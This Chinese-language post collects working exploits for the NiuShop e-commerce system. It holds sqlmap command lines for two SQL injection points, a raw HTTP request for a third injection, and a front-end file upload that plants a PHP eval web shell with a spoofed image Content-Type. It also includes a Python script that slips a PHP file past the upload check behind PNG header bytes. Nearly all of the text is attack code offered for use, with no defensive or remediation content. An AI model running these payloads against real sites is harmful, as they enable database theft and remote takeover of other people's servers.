NiuShop漏洞合集

SQL注入

注入1

sqlmap -u "http://www.safeinfo.me/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql"

注入2

sqlmap -u "http://www.safeinfo.me/index.php?s=/wap/Goods/promotionZone&group_id=*&page=1" --random-agent --batch --dbms "mysql"

多用户注入

POST /index.php?s=/wap/Goods/goodsSearchList HTTP/1.1
Host: 172.16.209.129:8086
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.209.129:8086/index.php/wap/goods/goodsSearchList
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Cookie: PHPSESSID=uolpfnofnhcmdnamo55d883bk4; admin_type=1; workspaceParamSupplier=index%7CGoods; CNZZDATA009=30037667-1536735
Connection: close
Cache-Control: max-age=0

sear_name=&sear_type=1&order=*&sort=asc&controlType=&shop_id=0&page=1

保存为 1.txt

sqlmap -r 1.txt  --random-agent --batch --dbms "mysql"

前台Getshell

Getshell 一

POST /niushop/index.php?s=/components/imgupload HTTP/1.1
Host: 192.168.43.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------8057819217448682651318751492
Content-Length: 243
Referer: http://www.safeinfo.me/niushop/index.php?s=/member/reviewcommodity&orderid=2
Cookie: PHPSESSID=u1q2u693pj81c1tkaqjomb5qm0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------8057819217448682651318751492
Content-Disposition: form-data; name="imgPhoto"; filename="11.php"
Content-Type: text/php  //修改为image/jpg 或者 png 或者gif 以及其他内容
<?php @eval($_POST['1']) ?>
-----------------------------8057819217448682651318751492--

Getshell 二

import requests

session = requests.Session()

paramsGet = {"s":"/wap/upload/photoalbumupload"}
paramsPost = {"file_path":"upload/goods/","album_id":"30","type":"1,2,3,4"}
paramsMultipart = [('file_upload', ('themin.php', "\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89\x00\x00\x00\x0bIDAT\x08\x99c\xf8\x0f\x04\x00\x09\xfb\x03\xfd\xe3U\xf2\x9c\x00\x00\x00\x00IEND\xaeB`\x82<? php phpinfo(); ?>", 'application/octet-stream'))]
headers = {"Accept":"application/json, text/javascript, */*; q=0.01","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Android 9.0; Mobile; rv:61.0) Gecko/61.0 Firefox/61.0","Referer":"http://127.0.0.1/index.php?s=/admin/goods/addgoods","Connection":"close","Accept-Language":"en","Accept-Encoding":"gzip, deflate"}
cookies = {"action":"finish"}
response = session.post("http://127.0.0.1/index.php", data=paramsPost, files=paramsMultipart, params=paramsGet, headers=headers, cookies=cookies)

print("Status code:   %i" % response.status_code)
print("Response body: %s" % response.content)

暂时就这么多